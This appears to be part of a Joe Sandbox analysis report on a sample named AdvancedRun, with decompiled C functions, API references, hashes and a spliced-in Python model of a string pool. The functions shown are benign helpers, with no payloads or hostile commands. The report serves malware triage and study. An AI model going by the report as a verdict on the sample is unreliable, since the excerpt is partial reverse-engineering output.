                                                                  				intOrPtr _v44;                      /* lpstrFileTitle  (+0x24) */
                                                                  				intOrPtr _v48;                      /* nMaxFile        (+0x20) */
                                                                  				wchar_t* _v52;                      /* lpstrFile       (+0x1c) */
                                                                  				intOrPtr _v56;                      /* nFilterIndex    (+0x18) */
                                                                  				intOrPtr _v64;                      /* lpstrCustomFilter (+0x10) */
                                                                  				intOrPtr _v68;                      /* lpstrFilter     (+0x0c) */
                                                                  				intOrPtr _v76;                      /* hwndOwner       (+0x04) */
                                                                  				struct tagOFNA _v80;                /* lStructSize     (+0x00) */
                                                                  
                                                                  				_v76 = __eax;                       /* owner window */
                                                                  				_v68 = _a4;                         /* filter string */
                                                                  				_v64 = 0;
                                                                  				_v44 = 0;
                                                                  				_v36 = 0;
                                                                  				_v32 = _a8;                         /* dialog title */
                                                                  				_v20 = _a12;                        /* default extension */
                                                                  				_v80 = 0x4c;                        /* OPENFILENAME_SIZE_VERSION_400 (76 bytes) */
                                                                  				_v56 = 1;
                                                                  				_v52 = __esi;                       /* caller-supplied path buffer */
                                                                  				_v48 = 0x104;                       /* MAX_PATH */
                                                                  				/* OFN_EXPLORER | OFN_FILEMUSTEXIST | OFN_PATHMUSTEXIST | OFN_HIDEREADONLY */
                                                                  				_v28 = 0x81804;
                                                                  				if(GetOpenFileNameW( &_v80) == 0) {
                                                                  					return 0;                       /* cancelled or failed */
                                                                  				} else {
                                                                  					wcscpy(__esi, _v52);
                                                                  					return 1;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileNameOpenwcscpy
                                                                  • String ID: L
                                                                  • API String ID: 3246554996-2909332022
                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 58%
                                                                  			/* Thin wrapper around LookupAccountSidW that resolves the export at run
                                                                  			   time instead of importing it: E00408F72 makes sure the module handle
                                                                  			   at *__eax is loaded, GetProcAddress fetches the function, and it is
                                                                  			   called with a NULL system name (local machine) followed by the six
                                                                  			   caller arguments. Returns the API's result, or 0 if the module or
                                                                  			   export could not be resolved. */
                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                  				void* __esi;
                                                                  				_Unknown_base(*)()* _t10;           /* resolved LookupAccountSidW */
                                                                  				void* _t12;                         /* return value */
                                                                  				struct HINSTANCE__** _t13;          /* pointer to the module handle */
                                                                  
                                                                  				_t13 = __eax;
                                                                  				_t12 = 0;
                                                                  				if(E00408F72(__eax) != 0) {
                                                                  					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                  					if(_t10 != 0) {
                                                                  						/* LookupAccountSidW(NULL, Sid, Name, cchName, Domain, cchDomain, peUse) */
                                                                  						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                  					}
                                                                  				}
                                                                  				return _t12;
                                                                  			}

                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: LookupAccountSidW$Y@
                                                                  • API String ID: 190572456-2352570548
                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 37%
                                                                  			/* Enables filesystem auto-completion on the edit control _a4 by
                                                                  			   loading shlwapi.dll (E00405436 wraps LoadLibraryW), resolving
                                                                  			   SHAutoComplete with GetProcAddress, calling it, and unloading the
                                                                  			   library again. Returns the API's HRESULT, or 0 if the export was
                                                                  			   not found. */
                                                                  			E0040AD85(intOrPtr _a4) {
                                                                  				_Unknown_base(*)()* _t3;            /* resolved SHAutoComplete */
                                                                  				void* _t7;                          /* return value */
                                                                  				struct HINSTANCE__* _t8;            /* shlwapi.dll module handle */
                                                                  				char** _t9;                         /* stack slot for the export name */
                                                                  
                                                                  				_t7 = 0;
                                                                  				_t8 = E00405436(L"shlwapi.dll");
                                                                  				 *_t9 = "SHAutoComplete";           /* name pushed for the call below */
                                                                  				/* the decompiler did not recover the second argument ("??"); it is the
                                                                  				   "SHAutoComplete" string stored on the stack just above */
                                                                  				_t3 = GetProcAddress(_t8, ??);
                                                                  				if(_t3 != 0) {
                                                                  					/* SHACF_AUTOSUGGEST_FORCE_ON | SHACF_FILESYSTEM */
                                                                  					_t7 =  *_t3(_a4, 0x10000001);
                                                                  				}
                                                                  				FreeLibrary(_t8);
                                                                  				return _t7;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                  • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                  • String ID: shlwapi.dll
                                                                  • API String ID: 4092907564-3792422438
                                                                  • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                  • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00406597(wchar_t* __esi) {
                                                                  				wchar_t* _t2;
                                                                  				wchar_t* _t6;
                                                                  
                                                                  				_t6 = __esi;
                                                                  				E00404AD9(__esi);	// fills __esi with the module path via GetModuleFileNameW(NULL, buf, 0x104)
                                                                  				_t2 = wcsrchr(__esi, 0x2e);	// last '.' anywhere in the path; if the file name has no extension, a '.' in a directory name is hit instead
                                                                  				if(_t2 != 0) {
                                                                  					 *_t2 =  *_t2 & 0x00000000;	// cut off the extension
                                                                  				}
                                                                  				return wcscat(_t6, L"_lng.ini");	// <dir>\<name>.exe -> <dir>\<name>_lng.ini, i.e. a language file looked up next to the executable
                                                                  			}
                                                                  APIs
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 004065A0
                                                                  • wcscat.MSVCRT ref: 004065B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                  • String ID: _lng.ini
                                                                  • API String ID: 383090722-1948609170
                                                                  • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                  • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040AC52() {
                                                                  				struct HINSTANCE__* _t1;
                                                                  				_Unknown_base(*)()* _t2;
                                                                  
                                                                  				if( *0x4101c4 == 0) {	// lazy load: the module handle is cached in the global at 0x4101c4
                                                                  					_t1 = E00405436(L"shell32.dll");	// same path-building LoadLibraryW helper as for shlwapi.dll
                                                                  					 *0x4101c4 = _t1;
                                                                  					if(_t1 != 0) {
                                                                  						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                  						 *0x4101c0 = _t2;	// resolved function pointer cached in the global at 0x4101c0 (not re-resolved on later calls)
                                                                  						return _t2;
                                                                  					}
                                                                  				}
                                                                  				return _t1;
                                                                  			}
                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                  • API String ID: 946536540-880857682
                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E00406670(char** __esi, void* __eflags) {
                                                                  				char* _t30;
                                                                  				char** _t39;
                                                                  
                                                                  				_t39 = __esi;
                                                                  				 *__esi = "cf@";	// the decompiler rendered the immediate 0x00406663 as a string; it is a code-section pointer written to the object's first dword (consistent with a vtable pointer)
                                                                  				__esi[0xb8] = 0;	// __esi is typed char**, so each index is a 4-byte slot (0xb8 -> byte offset 0x2e0)
                                                                  				_t30 = E00404FA4(0x338, __esi);	// most likely the memset wrapper (memset is in this function's API ID): zero the 0x338-byte object
                                                                  				_push(0x14);
                                                                  				__esi[0xcb] = 0;
                                                                  				__esi[0xa6] = 0;
                                                                  				__esi[0xb9] = 0;
                                                                  				__esi[0xba] = 0xfff;
                                                                  				__esi[8] = 0;
                                                                  				__esi[1] = 0;
                                                                  				__esi[0xb7] = 1;
                                                                  				L0040B26C();	// operator new (??2@ in the API ID) for the 0x14 bytes pushed above; the decompiler did not bind its return value, which is what _t30 holds below
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;	// allocation failed: the slot stays NULL
                                                                  				} else {
                                                                  					_t30[4] = 0;	// every 0x14-byte sub-object is initialised the same way: four zero dwords and 0x100 at +0xc
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_push(0x14);
                                                                  				_t39[2] = _t30;	// sub-objects are stored in slots 2..5 of the parent
                                                                  				L0040B26C();
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;
                                                                  				} else {
                                                                  					_t30[4] = 0;
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_push(0x14);
                                                                  				_t39[3] = _t30;
                                                                  				L0040B26C();
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;
                                                                  				} else {
                                                                  					_t30[4] = 0;
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_push(0x14);
                                                                  				_t39[4] = _t30;
                                                                  				L0040B26C();
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;
                                                                  				} else {
                                                                  					_t30[4] = 0;
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_t39[5] = _t30;
                                                                  				return _t39;	// returns the initialised object (constructor-style)
                                                                  			}
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset
                                                                  • String ID:
                                                                  • API String ID: 1860491036-0
                                                                  • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                  • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                  				int _v8;
                                                                  				signed int _v12;
                                                                  				void* __edi;
                                                                  				signed int _t30;
                                                                  				int _t32;
                                                                  				intOrPtr _t33;
                                                                  				intOrPtr _t36;
                                                                  				signed int _t48;
                                                                  				signed int _t58;
                                                                  				signed int _t59;
                                                                  				signed int _t60;
                                                                  				void** _t62;
                                                                  				void** _t63;
                                                                  				signed int* _t66;
                                                                  
                                                                  				_t66 = __eax;	// this: a pool of NUL-terminated wide strings plus a dword table of their start offsets
                                                                  				_t32 = wcslen(_a4);
                                                                  				_t48 =  *(_t66 + 4);	// wchar units already used (terminators included) = start of the new string
                                                                  				_t58 = _t48 + _t32;
                                                                  				_v12 = _t58;	// position of the new terminator
                                                                  				_t59 = _t58 + 1;
                                                                  				_v8 = _t32;
                                                                  				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                  				 *(_t66 + 4) = _t59;	// the new used count is stored before the buffer is grown
                                                                  				_t62 = _t66 + 0x10;	// &wchar_t buffer
                                                                  				if(_t59 != 0xffffffff) {
                                                                  					E00404951(_t66, _t59, _t62, 2, _t33);	// grow helper (malloc/memcpy/free, see subcall APIs), element size 2
                                                                  				} else {
                                                                  					free( *_t62);	// only when the new length wraps to -1
                                                                  				}
                                                                  				_t60 =  *(_t66 + 0x1c);	// number of strings stored so far
                                                                  				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                  				_t63 = _t66 + 0xc;	// &dword offset table
                                                                  				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                  					E00404951(_t66 + 8, _t60, _t63, 4, _t36);	// same helper, element size 4
                                                                  				} else {
                                                                  					free( *_t63);
                                                                  				}
                                                                  				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);	// copy len*2 bytes at the old end of the buffer
                                                                  				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;	// write the terminator
                                                                  				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;	// offsets[count] = start of the new string
                                                                  				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                  				_t30 =  *(_t66 + 0x1c) - 1;	// index of the string just appended
                                                                  				return _t30;
                                                                  			}
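Reading E004054DF as a string-pool append (wcslen, grow the wchar_t buffer at +0x10 and the dword table at +0x0c, memcpy, terminator, record the old used count, return count-1) is easier to check against a small model than against the raw listing. The Python below is an added example written for this report and is not code from the sample: the field names are its own, the offsets quoted in the comments are the ones visible in the decompilation above, and the sample strings in the usage are constructed from names that appear on this page. It also rebuilds a pool from the raw buffer and table bytes, which is how the structure would be read back out of one of the memory dumps listed below.

```python
import struct
from typing import List, Tuple


class WideStringPool:
    """Model of the structure E004054DF appends to (example, not the sample's code).

    The decompilation shows a wchar_t buffer at +0x10 (grown with element size 2),
    a dword table at +0x0c (element size 4), a used-wchar counter at +0x04 and a
    string counter at +0x1c. Field names here are this example's own.
    """

    def __init__(self) -> None:
        self.buf: List[str] = []      # +0x10: concatenated UTF-16 units, each string NUL-terminated
        self.offsets: List[int] = []  # +0x0c: start index (in wchar units) of each string

    @property
    def used(self) -> int:
        # +0x04: wchar units consumed so far, terminators included (the code stores used+len+1)
        return len(self.buf)

    @property
    def count(self) -> int:
        return len(self.offsets)      # +0x1c

    def append(self, s: str) -> int:
        """Mirror of E004054DF: copy len*2 bytes at the old end, write the terminator,
        store the old used count in the offset table and return the new index."""
        start = self.used             # _t48 = *(obj+4) before the append
        self.buf.extend(s)            # memcpy(buf + _t48*2, s, len*2)
        self.buf.append("\0")         # buf[_t48 + len] = 0
        self.offsets.append(start)    # offsets[count] = _t48
        return self.count - 1         # *(obj+0x1c) is incremented, count-1 is returned

    def get(self, index: int) -> str:
        """Read string `index` back: from its recorded offset up to the next NUL."""
        start = self.offsets[index]
        end = self.buf.index("\0", start)
        return "".join(self.buf[start:end])

    def dump(self) -> Tuple[bytes, bytes]:
        """Raw bytes as they would sit in memory: the wchar buffer and the dword table."""
        chars = "".join(self.buf).encode("utf-16-le")
        table = struct.pack("<%dI" % self.count, *self.offsets)
        return chars, table

    @classmethod
    def from_dump(cls, chars: bytes, table: bytes, count: int) -> "WideStringPool":
        """Rebuild the pool from dump bytes: the +0x10 buffer, the +0x0c table and *(obj+0x1c)."""
        pool = cls()
        pool.buf = list(chars.decode("utf-16-le"))
        pool.offsets = list(struct.unpack("<%dI" % count, table[:4 * count]))
        return pool


if __name__ == "__main__":
    # Constructed usage: strings taken from names on this page.
    pool = WideStringPool()
    for name in ("shlwapi.dll", "SHAutoComplete", "_lng.ini"):
        print(pool.append(name), name)
    chars, table = pool.dump()
    rebuilt = WideStringPool.from_dump(chars, table, pool.count)
    print([rebuilt.get(i) for i in range(rebuilt.count)], rebuilt.offsets)
```

Because `used` counts terminators, the offsets recorded are 0, 12, 27 for the three strings above, and the table read back from the dump reproduces them; that is the invariant to look for when locating this structure in the `.sdmp` files.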
                                                                  APIs
                                                                  • wcslen.MSVCRT ref: 004054EC
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                    • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                    • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                    • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                  • memcpy.MSVCRT ref: 00405556
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: free$memcpy$mallocwcslen
                                                                  • String ID:
                                                                  • API String ID: 726966127-0
                                                                  • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                  • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 81%
                                                                  			E00405ADF() {
                                                                  				void* _t25;
                                                                  				signed int _t27;
                                                                  				signed int _t29;
                                                                  				signed int _t31;
                                                                  				signed int _t33;
                                                                  				signed int _t50;
                                                                  				signed int _t52;
                                                                  				signed int _t54;
                                                                  				signed int _t56;
                                                                  				intOrPtr _t60;
                                                                  
                                                                  				_t60 =  *0x41c470;
                                                                  				if(_t60 == 0) {
                                                                  					_t50 = 2;
                                                                  					 *0x41c470 = 0x8000;
                                                                  					_t27 = 0x8000 * _t50;
                                                                  					 *0x41c474 = 0x100;
                                                                  					 *0x41c478 = 0x1000;
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                  					L0040B26C();
                                                                  					 *0x41c458 = _t27;
                                                                  					_t52 = 4;
                                                                  					_t29 =  *0x41c474 * _t52;
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                  					L0040B26C();
                                                                  					 *0x41c460 = _t29;
                                                                  					_t54 = 4;
                                                                  					_t31 =  *0x41c474 * _t54;
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                  					L0040B26C();
                                                                  					 *0x41c464 = _t31;
                                                                  					_t56 = 2;
                                                                  					_t33 =  *0x41c478 * _t56;
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                  					L0040B26C();
                                                                  					 *0x41c45c = _t33;
                                                                  					return _t33;
                                                                  				}
                                                                  				return _t25;
                                                                  			}

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID:
                                                                  • API String ID: 1033339047-0
                                                                  • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                  • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:12.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:42
                                                                  Total number of Limit Nodes:4

                                                                  Graph

[Execution graph rendering omitted: one chain starts at 0xa05618 and reaches RtlDecodePointer via 0xa05748 / 0xa05739; a second starts at 0x2ff1624 and reaches GetFileAttributesW via 0x2ff46a8, 0x2ff4770, 0x2ff47d8, 0x2ff4a78 and 0x2ff42a0.]

                                                                  Executed Functions

                                                                  Control-flow Graph

[Control-flow graph rendering omitted: blocks 0x2ffcef8-0x2fff111 (calls 0x2ff6dc0 and 0x2ff6de0), 0x2fff11b-0x2fff12c, 0x2fff132-0x2fff184.]
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$\l$\l$\l$\l
                                                                  • API String ID: 0-1760859083
                                                                  • Opcode ID: 4996e1c7ca5401efc3cf8786819a3bbac511a1538303a17e2b2025486e659b04
                                                                  • Instruction ID: bd73ac85a0ea54971c1c0b4ce50393b501d1bef206a8694ac931c94de42d5473
                                                                  • Opcode Fuzzy Hash: 4996e1c7ca5401efc3cf8786819a3bbac511a1538303a17e2b2025486e659b04
                                                                  • Instruction Fuzzy Hash: BC034A7190411C8FEB25EB60C890BDE77BAAF8A714F1150E9D20A6F260DF309E85DF56
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

[Control-flow graph rendering omitted: blocks 0x2ffcf08-0x2fff12c (calls 0x2ff6dc0 and 0x2ff6de0), 0x2fff132-0x2fff184.]
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$\l$\l$\l$\l
                                                                  • API String ID: 0-1760859083
